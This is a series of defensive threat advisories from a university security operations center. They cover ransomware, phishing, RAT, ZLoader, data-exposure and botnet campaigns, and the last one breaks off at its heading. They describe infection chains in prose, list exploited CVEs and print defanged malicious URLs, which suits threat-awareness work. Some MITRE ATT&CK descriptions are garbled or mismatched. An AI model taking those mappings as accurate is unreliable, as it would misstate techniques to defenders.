Threat Advisories

I. Targeted Entities

• San Francisco 49ers

II. Introduction

Just before the Super Bowl kicked off, and two days after the FBI warned about the cybercriminals, BlackByte leaked what seems to be the 49ers’ team files.

III. Background Information

The 49ers were recently on the receiving end of a BlackByte ransomware attack that temporarily affected the team’s corporate IT network on Super Bowl Sunday.[2] BlackByte is a ransomware-as-a-service (RaaS) gang that leases its ransomware to affiliates who share the ransomware profits; they claimed responsibility for the attack by leaking files allegedly stolen in the assault. The 49ers confirmed the attack to Threatpost the following Monday.[2] The 49ers consulted with third-party cybersecurity firms for assistance and also notified law enforcement. As of Monday, the team was still investigating, but it appears as though the intrusion was limited to the 49ers’ corporate IT network and did not affect ticket systems or systems at the 49ers’ stadium, Levi Stadium.[2] According to Joseph Carson, chief security scientist and advisory CISO at Delinea, it is likely that an affiliate hacked the 49ers, as opposed to BlackByte, given that BlackByte is an RaaS.[2]

BlackByte recently posted some files that seem to have been stolen from the team on a dark website in a file called 2020 Invoices.[2] BlackByte has not made its ransom demands public, nor have they specified how much data they stole or encrypted. Joseph Carson says that the timing of this attack makes this a case of cybercriminals preying on a major event, where attackers can get unsuspecting victims “to click on links, download and execute malicious software or give over their credentials, thinking they are accessing legitimate internet services, resulting in cybercriminals gaining initial access to networks and services.”[2]

The attack comes two days after the FBI and Secret Service released a joint TLP: WHITE cybersecurity advisory saying that BlackByte ransomware had breached the networks of at least three organizations from U.S. critical infrastructure sectors (government facilities, financial, and food & agriculture) in the last three months.[2]

BlackByte was first seen in July 2021 when it started victimizing organizations by exploiting known Microsoft Exchange vulnerabilities to worm its way into environments.[2] BlackByte was successful for a time, scoring wins against manufacturing, healthcare, and construction industries in the U.S., Europe, and Australia, but BlackByte hit a wall when Trustwave released a free decryption tool that allowed BlackByte victims to free their files.[4] BlackByte’s auction site has been considered a house of mirrors because the site claims to contain exfiltrated data from victims, but the ransomware itself doesn’t have the ability to exfiltrate data. This is done, most likely, to scare their victims into obeying their demands.[2]

Erich Kron, security awareness advocate at KnowBe4, focused on the FBI warning about BlackByte’s success in penetrating the critical infrastructure sector, which has been “plagued” by ransomware attacks.[2] Kron says that the critical nature of the systems means that it is imperative that the systems come back online quickly, which increases the likelihood that the victim pays the ransomware. Kron also says that the critical nature of the infrastructure also increases law enforcement attention, but that law enforcement busts have a low success rate, meaning that the groups are willing to take that risk.[2] Kron blames limited budgets, aging equipment, and shortages in cybersecurity staff for making critical infrastructure and many government entities susceptible to ransomware attacks.[2]

IV. MITRE ATT&CK

• T1590 – Gather Victim Network Information
  Attackers focus on gathering information using ransomware attacked to collect data of the users through network systems.
• T1027 – Obfuscated Files or Information
  Attackers use tools that download files to systems using encryption keys and store data information through the network of the systems.
• T1213 – Data From Information Repositories
  Ransomware attacks are used to collect a wide variety of information and data during exchanged between users.

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should alsobe educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures.
• Malware Monitoring
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/konq0383pcl8it2pjmfwbvke7bdj9nmb

VII. References

(1) FBI, Secret Service, ed. “Indicators of Compromise Associated with BlackByte Ransomware.” Internet Crime Compliant Center IC3, February 11, 2022. https://www.ic3.gov/Media/News/2022/220211.pdf.

(2) Vaas, Lisa. “BlackByte Tackles the SF 49ers & US Critical Infrastructure.” Threatpost English Global, February 14, 2022. https://threatpost.com/blackbyte-tackles-the-sf-49ers-us-critical-infrastructure/178416/.

Threat Advisory created by the Cyber Florida Security Operations Center.
Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

I. Targeted Entities

• Intuit users

II. Introduction

A phishing campaign is underway with cybercriminals impersonating the popular Intuit software during the tax season.

III. Background Information

Intuit is warning customers of a phishing campaign that threatens to restrict users from accessing their accounts unless they click on a malicious link. These attacks are quickly escalating, and attackers are employing stealthier methods in hopes of tricking users into installing malware or giving up personal data.

Intuit has posted a screenshot of a suspicious email that customers have reported receiving, which the company says, “did not come from Intuit”.[1]

The fake email, which appears to be sent from the Intuit Maintenance Team, informs recipients that their account has been “temporarily disabled due to inactivity” and that it is “compulsory” to restore access to the account within 24 hours.[2] The email claims to warn users of a “recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season.” The email directs users to a link (https://proconnect[dot]intuit.com/Pro/Update) and claims that clicking on the link will allow users to immediately regain access to their accounts.[2]

Erich Kron, security professional and awareness advocate at KnowBe4, says that he was not surprised to learn of such an engineered attack on Intuit and expects that more of these attacks will come as we progress through tax season.[2]

Phishers have been vigorously escalating attacks, using more creative ways to trick users into taking the bait and hide their malicious activity. Researchers have reported a flurry of phishing attacks using new tricks and tactics since the end of last year. In just the last week, security researchers have found two novel ways that phishers are targeting victims. In one, Proofpoint researchers saw adversaries using phishing kits that were focused on bypassing multi-factor authentication methods by stealing authentication tokens via man-in-the-middle attacks. The other phishing campaign saw attackers using an under-the-radar PowerPoint file to hide malicious executables that can rewrite Windows registry settings, with the end goal of taking over an end user’s computer. There have also been phishing attacks aimed at stealing credentials using a legitimate Google Drive collaboration feature as well as the “Comments” feature of a Google Doc to trick users into clicking malicious links.[1]

Phishing has been around a long time, and it is a threat vector that will never get old. Only one click is necessary to make a phishing campaign effective for the threat actor. It also remains dangerous because credential stealing from victims is often a gateway attack that provides criminals a way to further engage victims with more attacks, like defrauding people of money or ransomware attacks on corporate networks. It is also difficult for an organization to stop phishing attacks because they rely on human error rather than a compromise of an infrastructure that the organization controls.[1]

Intuit is not providing information about what happens if a user clicks on the link, but the company is warning customers that the link is likely malicious and to refrain from clicking on the link or any attachment sent with the email. If a customer has already clicked on the link, Intuit recommends they delete any resulting downloads immediately, scan their system with an updated antivirus program, and change their passwords.[1]

IV. MITRE ATT&CK

• T1589 – Gather Victim Identity Information
  Attackers have developed a phishing method where users can be trapped by clicking website links. From those links, users’ private information can be collected
• T1598 – Phishing for Information
  Users can be trapped into phishing by attackers who use special kits to gather information
• T1014 – Rootkit
  Attackers have developed multiple kits for phishing purposes. These kits might gain access in user or kernel levels in operating systems, which can give the control of the levels to attackers.
  

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should alsobe educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
• Malware Monitoring
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/1ep8nc69qn02neaurnll3vd2e2xr5ip1

VII. References

(1) Intuit, ed. “Security Notices.” Intuit Security Center, February 2, 2022. https://security.intuit.com/security-notices.

(2) Montalbano, Elizabeth. “Attackers Target Intuit Users by Threatening to Cancel Tax Accounts.” Threatpost English Global, February 4, 2022. https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/.

Threat Advisory created by the Cyber Florida Security Operations Center.
Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

I. Targeted Entities

• Amazon Web Services
• Azure Cloud Services

II. Introduction

Cybercriminals are taking advantage of Amazon Web Services (AWS) and Azure Cloud services to deliver a trio of remote access trojans (RATs), all aimed to collect sensitive information from select users. According to researchers at Cisco Talos, threat actors have been distributing variants of the malware known as AsyncRAT, Netwire, and Nanocore since October 2020, mainly to targets in Italy, Singapore, South Korea, Spain, and the United States.

III. Background Information

The attacks start with a phishing email containing a malicious .zip attachment, but the criminals also have a cloud-based trick that can be used: “the .zip archive files contain an ISO image with a malicious loader in the form of JavaScript a Windows batch file or Visual Basic script. When the initial script is executed on the victim’s machine, it connects to a download server to download the next stage, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance,” says Talos researchers.[1]

Researchers say that using cloud services to host the payloads is a decision made in order to avoid detection while cutting the costs of the campaign since the attackers don’t have to set up their own infrastructure. It also makes it more difficult for defenders to track down the attackers. The threat actor behind this campaign maintains a distributed infrastructure consisting of download servers, command-and-control servers (C2s), and malicious subdomains, researchers said.[2] The download servers are hosted on Microsoft Azure and AWS. These well-known cloud services are used because of the inherent trust the public has with the well-known companies to be secure. Network defenders may think that communications to an IP address owned by Microsoft or Amazon are innocent because of the multitude of benign communications they frequently see across multiple services.

Further, the main JavaScript downloader used in this campaign uses a four-layer, complex obfuscation technique in its script. Researchers say, “Each stage of the deobfuscation process results with the decryption methods for the subsequent stages to finally arrive at the actual malicious downloader method. The deobfuscation process is performed at each stage with every next stage generated as the result of the previous stage deobfuscation function.”[2] The batch script has an obfuscated command that runs PowerShell to download and run a payload from a download server on Azure cloud. Obfuscated VB downloaders execute a PowerShell command, which runs and connects to the download server running on AWS EC2.[2] To avoid detection, the attackers use the DuckDNS dynamic DNS service to change the domain names of the C2 hosts. Talos researchers found that the threat actors have registered several malicious subdomains using the service.[2]

The RATs used in this campaign include:

• AsyncRAT: used to remotely monitor and control computers through a secure, encrypted connection to a C2 server. It also contains a keylogger, screen recorder, and a system configuration manager, which allows the attacker to steal confidential data from the victim’s machine
• NetwireRAT: a known threat used by attackers to steal victims’ passwords, login credentials, and credit card data. It can also remotely execute the commands and collect file-system information
• Nanocore: a 32-bit .Net portable executable, which was first seen in 2013. The version used in this campaign contains two plugins, called Client and SurveillanceEX. Client, and handles the communications with the C2 server, and SurveillanceEX captures video and audio, as well as monitoring remote desktop activity.[2]

Talos researchers suggest that organizations deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages, and break the infection chain as early as possible.”

Miclain Keffeler, an application security consultant at nVisium, noted that the rise in the adoption of cloud technologies has forced a shift in security. But this shift means that cloud providers should also ensure that their systems are secure, saying that it is important for malicious usage of their services to be halted immediately when found. “These kinds of attacks aren’t going anywhere, so it’s important that cloud providers like AWS and Microsoft Azure step in to develop more processes around the notification of malicious use cases — especially given the complex nature of the current threatscape.”[2]

IV. MITRE ATT&CK

• T1005 – Data From Local System
  Threat actors can search through local system sources such as local databases to find sensitive data prior to exfiltration.
• T1063 – Security Software Discovery
  Attackers can become aware of which configurations, software, and sensors that are currently running in a system.
• T1555 – Credentials From Password Stores
  Can retrieve passwords from mail and messaging applications.
• T1105 – Ingress Tool Transfer
  Payload set to download from C2 onto the compromised host.
• T1059 – Command and Scripting Interpreter
  Opens remote command-line interface and executes commands used in JavaScript files.

For more MITRE ATT&CKs, please confer the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
• Monitor Malware
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Implement Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Multi-layered Security Controls
  Creating a multi-layered security system entails that there are numerous components that shield multiple operational layers.
• Enhance Email Security
  Increasing email security allows for the detection and mitigation of malicious emails.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/xlo3kyjeye6q44qk3jusm2n1xin9cf32

VII. References

(1) Raghuprasad, Chetan, and Vanja Svajcer. “Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure.” Cisco Talos Intelligence Group, January 12, 2022. https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html.

(2) Seals, Tara. “Amazon, Azure Clouds Host Rat-Ty Trio in Info-Stealing Campaign.” Threatpost English Global, January 12, 2022. https://threatpost.com/amazon-azure-clouds-rat-infostealing/177606/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

I. Targeted Entities

• Online bank users

II. Introduction

An information-stealing campaign using ZLoader malware, which has been previously used to deliver other ransomware, has already claimed over 2,000 victims across more than 100 countries.

III. Background Information

Researchers at Check Point Research (CPR) discovered that the cybercriminal group “Malsmoke” has been taking advantage of Microsoft’s digital signature verification to steal user credentials and other sensitive information by delivering the ZLoader malware, which has also been used to distribute Ryuk and Conti ransomware in the past. (2) The threat actors have already claimed 2,170 victims in 111 countries, mainly in the U.S., Canada, and India.

ZLoader is a banking trojan that uses web injection to steal cookies, passwords, and other sensitive information from victims’ machines. (2) In September 2021, it caught the attention of the Cybersecurity Infrastructure and Security Agency (CISA) as a threat in the distribution of Conti and Ryuk ransomware. Attackers also used ZLoader as the delivery vehicle in multiple spearphishing campaigns, most notably at the beginning of the COVID-19 pandemic in March 2020. Again, in September of 2021, attackers spread ZLoader via Google AdWords in a campaign that used a tool to disable all Windows Defender modules on victims’ machines. (2)

This latest malware campaign by Malsmoke leverages Java in its attack vector, starting its illicit activity by installing a legitimate remote management program that acts as a Java installation. Once this happens, the attacker has full access to the victim machine and is able to upload and download files as well as run scripts. In time, attackers run a file called mshta.exe with the file appContast.dll as the parameter (which appears to be a Microsoft trusted file) to deliver the payload. CPR researchers say that appContast.dll is signed by Microsoft, even though extra information has been added to the end of the file. CPR researchers also say that, “the added information downloads and runs the final Zloader [sic] payload, stealing user credentials and private information from victims.”

Kobi Eisenkraft, a malware researcher at CPR, says that attackers have put in a great effort to evade detection. CPR has informed Microsoft and Altera, the maker of a remote management and monitoring tool, of their findings. CPR advises that Microsoft users apply Microsoft’s update for strict Authenticode verification immediately to avoid falling victim to the campaign. CPR also advised that people follow typical common-sense security practices to avoid installing programs from unknown sources, clicking on unfamiliar links, or opening unfamiliar attachments they receive in emails.

IV. MITRE ATT&CK

• T1204 – User Execution
  ZLoader relies upon specific actions by a user in order to gain execution.
• T1036 – Masquerading
  ZLoader attempts to manipulate features of their artifacts to make them appear legitimate or benign to users and security tools.
• T1112 – Modify Registry
  ZLoader interacts with the Windows Registry to hide configuration information within Registry keys, and to aid in execution.
• T1041 – Exfiltration Over C2 Channel
  ZLoader steals data by exfiltrating the data over an existing command and control server.

For more MITRE ATT&CKs, please confer the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
• Monitor Malware
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Implement Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/etguhg3nrjxrag2km48awhxlvxlg6p81

VII. References

(1) Cohen, Golan. “Can You Trust a File’s Digital Signature? New Zloader Campaign Exploits Microsoft’s Signature Verification Putting Users at Risk.” Check Point Research, January 5, 2022. https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/.

(2) Montalbano, Elizabeth. “’Malsmoke’ Exploits Microsoft’s E-Signature Verification.” Threatpost English Global, January 5, 2022. https://threatpost.com/malsmoke-microsoft-e-signature-verification/177363/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

I. Targeted Entities

• Stripchat Users
• Stripchat Models

II. Introduction

A database that contains highly sensitive information on users and models on the adult website, Stripchat, was discovered online and was left completely unprotected. Some say that the leak can put models and users at risk of extortion, violence, and more.

III. Background Information

Volodymyr “Bob” Diachenko, head of security research at Comparitech, reported that he found the database on an Elasticsearch cluster on November 5^th. The exposure was reported to Stripchat on November 5^th. The database contained 200 million Stripchat records, which included 65 million user records that contained email addresses, IP addresses, the amount in tips they gave to models, a timestamp of when the account was created, and the last payment activity. Another database found contained around 421,000 records for the platform’s models, including their usernames, gender, studio IDs, tip menus and prices, and their live status.[1] It is not clear if anyone with nefarious intent managed to access the data before it was secured on November 7^th. Max Bennet, a spokesperson for Stripchat, provided a statement to Threatpost saying that the content of the platform’s chat message was not exposed. He also stated that the leaked payment data contained transaction details and not credit card numbers.[1]

As mentioned previously, models are at risk of extortion, violence, and poses a privacy risk for both viewers and models, says Diachenko. This harassment could happen online or offline. Stripchat model and user information could also be used in targeted phishing campaigns. Diachenko warns that users should be on the lookout for fraudsters posing as Stripchat or other related companies. He also advises to “never click on links or attachments in unsolicited emails”.[1] The privacy risks for models and users could become more significant if the exposed information is cross-referenced with other data breaches. Should this happen, a full profile of a person could be drawn. However, Diachenko says that Stripchat data does not reveal a lot of personal info, with users often preferring not to state their real identities, email addresses, IP addresses (with the use of a VPN), etc.[1] Even so, a lot of that information can be matched with other data breaches and a match can still be made.

IV. MITRE ATT&CK

• T1560 – Archive Collected Data
  Prior to the exfiltration of data, attackers would utilize compression/encryption.
• T1530 – Data from Cloud Storage Object
  The Stripchat data breach contained information harvested from cloud-based server storage.
• T1598 – Phishing for Information
  As a result of the breach, gained user or model information through data leak might be used in phishing operations against them.
• T1114 – Email Collection
  Some of the victim’s personal email account might have gained access by attackers during the data breach to be used to compromise user message traffic.

V. Recommendations

• Phishing Awareness Training
  Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
  Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
• Malware Monitoring
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a

VI. Indicators of Compromise (IOCs)

Please see the general recommendations in the previous section for mitigating data breaches.

VII. References

(1) Bracken, Becky. “200M Adult Cam Model, User Records Exposed in Stripchat Breach.” Threatpost English Global, November 16, 2021. https://threatpost.com/adult-cam-model-user-records-exposed-stripchat-breach/176372/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Dorian Pope, and Tural Hagverdiyev.

I. Targeted Entities

• Microsoft Office Documents

II. Introduction

A new malware loader, SquirrelWaffle, is malware-spamming malicious Microsoft Office documents to deliver Qakbot malware.

III. Background Information

Cisco Talos researchers discovered malspam campaigns beginning in mid-September when they noticed booby-trapped Office documents infecting systems with SquirrelWaffle in the initial stage of the infection chain.[1] The campaigns are using stolen email threads to come off as replies in those, legitimate, threads. The SquirrelWaffle emails typically contain hyperlinks to malicious ZIP folders hosted on attacker-controlled web servers, Cisco Talos researchers say.[1] 76% of the emails are written in English, but the language shifts to the language that was used in the original email thread. The top five languages used include English, French, German, Dutch, and Polish.[1]

Cisco Talos researchers say that SquirrelWaffle isn’t a towering and majestic oak tree, at least not yet. The researchers provided an example of an email in which an attacker replied to an extortion email, which the researchers say is, “ineffective in convincing the recipient to access the content in the body of the email”.[1] The Cisco Talos researchers also say that SquirrelWaffle isn’t as prolific as other campaigns, like Emotet, but is growing.[1]

The Cisco Talos researchers analyzed the SquirrelWaffle campaign and found characteristics that pointed to the malicious Office documents as likely having been crafted using an automated builder. For example, in this campaign, “the Microsoft Excel spreadsheets were crafted to make static analysis with tools like XLMDeobfuscator less effective.”[1] The researchers have also said that SquirrelWaffle has seen daily spam runs since September 10^th. Another sign that SquirrelWaffle is being distributed with an automated builder is that the URL structure of its distribution servers is tied to the daily campaigns, and rotates every few days.[1]

Victims who click on the links in the malicious emails end up downloading a ZIP archive that contains infected Office files, specifically Word documents and Excel spreadsheets. However, researchers have noticed a shift away from Word documents and an almost exclusive use of Excel spreadsheets.[1] When Word documents were being used, the documents were spruced up in such a way to persuade users that the document was a Docusign document, a service used for sharing and signing documents. Whether a Word document or Excel spreadsheet is used, they are the vehicles that lead to the next stage: the SquirrelWaffle payload.

In all of the SquirrelWaffle campaigns seen, the links used to host the ZIP archives contain Latin words and follow a structure similar to this: abogados-en-medellin[.]com/odit-error/assumenda[.]zip.[1] Inside of the ZIP archives, the infected Office files often follow a naming convention like the following: chart-1187900052.xls or diagram-127.doc.[1]

The malware distributions are, seemingly, jumping on previously compromised web servers, primarily those running versions of WordPress, with the most prevalent compromised version being WordPress 5.8.1.[1] Cisco Talos researchers were unable to discern whether the responsible actor was the same threat or if the server had been attacked by multiple, different, actors. Although SquirrelWaffle is relatively new, researchers say that the implementations have a lot in common with those seen from other, more established threat actors. Cisco Talos recommends that organizations continue to use comprehensive defense security controls in order to prevent, detect, or respond to SquirrelWaffle campaigns that they may encounter.[1]

IV. MITRE ATT&CK

• T1059 – Command and Scripting Interpreter
  SquirrelWaffle leverages access to scripts in order to initialize its attack vector.
• T1137 – Office Application Startup
  Office Application Word can be set to startup, automatically providing a platform for malware drops.
• T1055 – Process Injection
  Malicious processes run on top of the victim OS.
• T1592 – Gather Victim Host Information
  SquirrelWaffle scans the host system for key information during the infection process.

V. Recommendations

• Patch Systems and Keep Them Updated
  Make sure your systems are always updated with the latest patch to avoid any malware taking advantage of outdated systems and zero-day vulnerabilities
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
• Malware Monitoring
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.app.box.com/file/878072989113

VII. References

(1) Vaas, Lisa. “Squirrelwaffle Loader Malspams, Packs Qakbot, Cobalt Strike.” Threatpost English Global, October 26, 2021. https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Dorian Pope

I. Targeted Entities

• Visual Tools DVRs

II. Introduction

A new exploit from cybercrime group FreakOut, also known as Necro Python and Python.IRCBot, has been found infecting Visual Tools DVRs with a Monero miner.

III. Background Information

Juniper Threat Labs researchers have written a report detailing the new activities from FreakOut. The team noticed in late September that the botnets started targeting Visual Tools DVR VX16 4.2.28.0 models with cryptomining attacks.[1] Visual Tools DVRs are generally used as part of a professional-grade surveillance system. A command injection vulnerability was found in the same devices last July.[1] FreakOut has been around since at least January of 2021, exploiting recently identified and unpatched vulnerabilities to launch DDoS and cryptomining attacks.[1] The researchers at Juniper report that the group has developed several iterations of the Necro bot, making steady improvements to its performance and persistence over the months.[1]

Juniper researchers say that the script can run in both Windows and Linux environments, and that the script has its own polymorphic engine to morph itself every execution, giving it the ability to bypass signature-based defenses. This happens, the researchers say, by reading every string in its code and encrypting it using a hardcoded key.[2]

The team at Juniper have also said that there have been a few changes to this bot from the previous version, notably that the SMB scanner, which was observed in a May 2021 attack, had been removed; the bot changed the URL that it injects to script files on the compromised system; and that more recent versions of the Necro bot scrapped previous reliance on a hardcoded URL in favor of a domain generation algorithm (DGA) for added persistence and harder detection.[2]

The Necro bot works in the following way: first, the bot scans for the target port (22, 80, 443, 8081, 7001). If the port is detected, it will launch an XMRig (a high performance Monero (XMR) miner) linked to a specific wallet. Juniper researchers say that the bot is also actively trying to exploit the following previously identified vulnerabilities:

• CVE-2020-15568 – TerraMaster TOS before 4.1.29
• CVE-2021-2900 – Genexis PLATINUM 4410 2.1 P4410-V2-1.28
• CVE-2020-25494 – Xinuos (formerly SCO) Openserver v5 and v6
• CVE-2020-28188 – TerraMaster TOS <= 4.2.06
• CVE-2019-12725 – Zeroshell 3.9.0[2]

Mounir Hahad, head of Juniper Threat Labs, says that security teams need security that is equipped to handle DGA domain attempts. Hahad also said, “The very existence of this kind of botnet highlights the need for a connected security approach where DNS security capabilities on the network identify connection attempts to DGA domains behind public dynamic DNS services, as well as routers, switches, and firewalls that are capable of immediately isolating the compromised host from the rest of the network.”[1]

IV. MITRE ATT&CK

• T1190 – Exploit Public-Facing Application
  Threat actor Necro Python have been targeting Visual Tools DVR VX16 4.2.28.0

• T1064 – Scripting
  A combination of standalone Python interpreter and a malicious script are used by the malware upon successful infection

• T1059.001 – PowerShell
  The malware uses PowerShell functions in order to download and run Python that includes all required modules

• T1055 – Process Injection
  The bot involved will also download a JavaScript-based miner that if clicked will run within the browser’s process space

• T1571 – Non-Standard Port
  Several non-standard ports were observed to be in use. These include but aren’t limited to ports: 5870, 42066, 52566, and 6697

• T1219 – Remote Access Software
  Necro Python bots are remotely controlled via C2 channels

• T1056 – Input Capture
  The JavaScript-based bot can be configured from the C2 channel to steal clipboard data and even log keystrokes

• T1027 – Obfuscated Files or Information
  Setup.py, which is downloaded via PowerShell commands, is an obfuscated bot

• T1547.001 – Registry Run Keys/Startup FolderUpon successful infection, several registry values are updated that point to the pyinstaller or the standalone setup.py

V. Recommendations

• Patch Systems and Keep Them Updated
  Make sure your systems are always updated with the latest patch to avoid any malware taking advantage of outdated systems and zero-day vulnerabilities
• Set Antivirus Programs to Conduct Regular Scans
  Ensure that antivirus and antimalware programs are scanning assets using up-to-date signatures
• Malware Monitoring
  Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
• Strong Cyber Hygiene
  Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
  Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
• Turn on Endpoint Protection
  Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/iaptndxys8jy0g7hiok9ee85ijzwdnue

VII. References

(1) Bracken, Becky. “FreakOut Botnet Turns DVRs Into Monero Cryptominers.” Threatpost English Global threatpostcom, October 13, 2021. https://threatpost.com/freakout-botnet-dvrs-monero-cryptominers/175467/.

(2) Kimayong, Paul. “Necro Python Botnet Goes After Vulnerable VisualTools DVR.” Official Juniper Networks Blogs. Juniper Networks, October 11, 2021. https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: James Krepps, Orlando Huertas, Dorian Pope, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev, and Ipsa Bhatt.

I. Targeted Entities

• Telegram
• Banks
• Contactless payment systems

II. Introduction

